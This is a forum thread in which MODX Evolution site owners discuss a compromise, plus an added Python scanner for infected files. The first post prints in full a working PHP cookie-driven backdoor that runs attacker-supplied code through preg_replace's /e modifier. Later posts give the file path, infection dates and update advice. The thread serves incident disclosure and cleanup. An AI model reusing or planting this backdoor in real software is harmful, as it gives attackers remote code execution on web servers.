-
- 1,613 Posts
I have a site which I was about to update (now 1.0.4) and in /assets/snippets/ditto/ there is a file called: snippet.ditto2.php with content:
<?php
/**
 * @package
 * @since
 */
class PlgSys {
    public function __construct() {
        $file = @$_COOKIE['Jlma3'];
        if ($file){
            $opt=$file(@$_COOKIE['Jlma2']);
            $au=$file(@$_COOKIE['Jlma1']);
            $opt("/292/e",$au,292);
            die();
        } else {
            phpinfo(); die;
        }
    }
}
$phpinfo = new PlgSys;
Is that a hack file? I do think so!
[ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
Evolution user, I like the back-end speed and simplicity
-
- 1,613 Posts
:)
Couldn't really find any other infected files besides that file; no idea what it does.
Anyway, the site is now updated to the newest version and I totally cleaned it.
No special snippets besides PHx were installed.
I found the file on another site too, which is updated, so I probably killed it.
-
- 1,613 Posts
Damn, found another 3 sites with /assets/snippets/ditto/snippet.ditto2.php
Anyone else having this file in that location?
Think it has to do with version 1.0.4 and older.
[ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
If you aren't running 1.0.14 then your site runs a high risk of being compromised, as there are multiple issues. I've seen quite a few sites exploited including 1.0.13 sites.
-
- 1,613 Posts
WOW, this is serious stuff, almost 20% of my sites have the PHP file!
These files were placed between 23-06-2014 and 25-06-2014! (different hosts)
People, please check your folders to see if you are infected:
/assets/snippets/ditto/snippet.ditto2.php
Also check your cache folder for suspicious .php files.
I think many people have that file?
I don't know what it does though... please let me know if you are also infected...
Just updating to 1.0.14 won't solve the hack if you are already hit (because it is not a default file and won't be overwritten).
[ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
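The check requested in the post above (the reported path, plus suspicious .php files elsewhere), as an added Python example that is not part of the original thread. Besides the path, it flags any PHP file that reads a cookie into a variable and then calls that variable as a function, the pattern visible in the file quoted in the first post; the sample tree and every file name other than the reported path are constructed.

```python
import re
import tempfile
from pathlib import Path

# Path reported in this thread, relative to the MODX Evolution web root.
KNOWN_BAD = "assets/snippets/ditto/snippet.ditto2.php"

# Heuristic (an assumption of this example): a variable is filled straight from $_COOKIE.
COOKIE_ASSIGN = re.compile(r"\$(\w+)\s*=\s*@?\s*\$_COOKIE\s*\[")


def cookie_callables(source):
    """Return variables that are set from $_COOKIE and later invoked like a function."""
    names = dict.fromkeys(COOKIE_ASSIGN.findall(source))  # de-duplicate, keep order
    return [n for n in names if re.search(r"\$" + re.escape(n) + r"\s*\(", source)]


def scan(webroot):
    """Return sorted (relative_path, reason) findings for every .php file under webroot."""
    root = Path(webroot)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        if rel == KNOWN_BAD:
            findings.append((rel, "path reported in this thread"))
        names = cookie_callables(path.read_text(errors="replace"))
        if names:
            findings.append((rel, "cookie value called as function: $" + ", $".join(names)))
    return sorted(findings)


def demo():
    """Build a constructed sample tree in a temp directory and scan it."""
    dropped = "<?php $f = @$_COOKIE['a']; if ($f) { $g = $f(@$_COOKIE['b']); }"
    benign = "<?php $lang = $_COOKIE['lang']; echo htmlspecialchars($lang);"
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in ((KNOWN_BAD, dropped),
                          ("assets/cache/x.php", dropped),
                          ("assets/snippets/ditto/snippet.ditto.php", benign)):
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan(tmp)


if __name__ == "__main__":
    for rel, reason in demo():
        print(rel, "->", reason)
```

Run `scan()` against a copy or backup of the web root; a hit from the content heuristic is a lead for manual review, not proof of compromise.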
-
- 1,613 Posts
I'm a bit amazed I'm the only one out here with this hack file.
-
- 1,613 Posts
I'm pretty sure it is the AjaxSearch stuff.
At the moment I really think an update and removing that file will close the leak, but if someone can find other files somewhere I would love to know; I didn't.
On a couple of infected sites I have installed a blank version of Evo 1.0.14 and copied back the config file and the images / templates and plugins/phx folders.
When I look at the script I see there is a cookie build, I don't get it. Doesn't look that harmful but who knows... Some Joomla sites have the same problem, I saw after googling.
-
- 953 Posts
Ah, will contact my friend and ask if AjaxSearch was in the sites.
My sites (touch wood) are all OK - I always delete everything I don't use e.g. snippets, plugins etc. and have never used AjaxSearch.
Will post back ASAP